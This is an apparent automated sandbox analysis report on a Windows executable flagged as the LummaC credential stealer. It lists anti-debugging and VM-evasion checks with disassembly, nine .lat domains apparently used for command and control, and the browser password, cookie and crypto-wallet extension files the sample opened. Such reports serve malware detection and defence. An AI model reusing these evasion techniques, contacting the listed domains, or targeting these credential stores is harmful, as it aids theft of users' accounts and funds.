              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564047D second address: 56404BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-2Ch] 0x0000000e pushad 0x0000000f jmp 00007F7F08BA1E44h 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7F08BA1E43h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56404BD second address: 56404F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007F7F08F64190h 0x0000000c xor cl, FFFFFFE8h 0x0000000f jmp 00007F7F08F6418Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ecx, ebx 0x00000020 mov edi, 61F429E2h 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56404F4 second address: 56404F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56404F9 second address: 5640537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 0BEBh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F7F08F6418Eh 0x00000011 push eax 0x00000012 jmp 00007F7F08F6418Bh 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7F08F64195h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640537 second address: 564053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56405C0 second address: 56405C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56405C6 second address: 56405CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56405CA second address: 563067C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7F79542209h 0x0000000e xor eax, eax 0x00000010 jmp 00007F7F08F3D8BAh 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 xor ebx, ebx 0x00000024 cmp esi, 00000000h 0x00000027 je 00007F7F08F642C5h 0x0000002d call 00007F7F0D8B081Fh 0x00000032 mov edi, edi 0x00000034 pushad 0x00000035 mov dx, cx 0x00000038 call 00007F7F08F6418Ch 0x0000003d movzx esi, dx 0x00000040 pop edi 0x00000041 popad 0x00000042 xchg eax, ebp 0x00000043 jmp 00007F7F08F6418Ah 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 563067C second address: 5630682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5630682 second address: 5630698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08F64192h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5630698 second address: 56306CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7F08BA1E46h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movsx edx, ax 0x00000019 mov eax, 3F7C83D5h 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56306CE second address: 56306D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56306D4 second address: 56306D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56306D8 second address: 56306E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov edi, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e mov di, cx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56306E9 second address: 5630713 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7F08BA1E3Ah 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7F08BA1E43h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5630713 second address: 5630719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5630754 second address: 563075A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 563075A second address: 5630760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5630760 second address: 5630764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56409B5 second address: 5640A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 mov cx, 3191h 0x0000000c pushad 0x0000000d jmp 00007F7F08F6418Ch 0x00000012 mov esi, 5AA6A101h 0x00000017 popad 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F7F08F6418Ch 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov ax, BEADh 0x00000026 movzx ecx, dx 0x00000029 popad 0x0000002a cmp dword ptr [75C7459Ch], 05h 0x00000031 jmp 00007F7F08F64195h 0x00000036 je 00007F7F7953217Ch 0x0000003c pushad 0x0000003d call 00007F7F08F6418Ch 0x00000042 pushfd 0x00000043 jmp 00007F7F08F64192h 0x00000048 or ax, 8ED8h 0x0000004d jmp 00007F7F08F6418Bh 0x00000052 popfd 0x00000053 pop ecx 0x00000054 call 00007F7F08F64199h 0x00000059 pop edx 0x0000005a popad 0x0000005b pop ebp 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F7F08F64199h 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640A78 second address: 5640A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08BA1E3Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640B12 second address: 5640B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640B2F second address: 5640B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640B35 second address: 5640B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650A66 second address: 5650ABC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7F08BA1E49h 0x00000008 adc ax, C886h 0x0000000d jmp 00007F7F08BA1E41h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov di, 3F3Ch 0x0000001f call 00007F7F08BA1E45h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650ABC second address: 5650B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F7F08F64193h 0x0000000f or ecx, 6BD29D1Eh 0x00000015 jmp 00007F7F08F64199h 0x0000001a popfd 0x0000001b call 00007F7F08F64190h 0x00000020 jmp 00007F7F08F64192h 0x00000025 pop ecx 0x00000026 popad 0x00000027 push ecx 0x00000028 jmp 00007F7F08F6418Eh 0x0000002d mov dword ptr [esp], esi 0x00000030 jmp 00007F7F08F64190h 0x00000035 mov esi, dword ptr [ebp+0Ch] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650B48 second address: 5650B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650B4C second address: 5650B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650B52 second address: 5650B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08BA1E3Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650D16 second address: 5650D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08F64194h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650D2E second address: 5650D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650D32 second address: 5650D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F7F08F64197h 0x0000000e pop ebp 0x0000000f pushad 0x00000010 call 00007F7F08F64194h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSpecial instruction interceptor: First address: D08A87 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSpecial instruction interceptor: First address: EAE614 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSpecial instruction interceptor: First address: D066B6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSpecial instruction interceptor: First address: D08988 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe TID: 7572Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe TID: 7572Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: yO9EAqDV15.exe, 00000000.00000002.2137261398.0000000000E90000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: yO9EAqDV15.exe, 00000000.00000002.2137952740.00000000017A3000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2136686014.00000000017A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: yO9EAqDV15.exe, 00000000.00000002.2137261398.0000000000E90000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: yO9EAqDV15.exe, 00000000.00000002.2137952740.0000000001768000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2136686014.0000000001768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: SICE
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: bashfulacid.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: tentabatte.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: curverpluch.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: talkynicer.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: shapestickyr.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: manyrestro.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: slipperyloo.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: wordyfindy.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: observerfry.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137261398.0000000000E90000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: (Program Manager
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: yO9EAqDV15.exe, 00000000.00000003.2126368400.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2136900603.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2080196097.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000002.2138135257.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2126187612.00000000017F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: yO9EAqDV15.exe PID: 7412, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
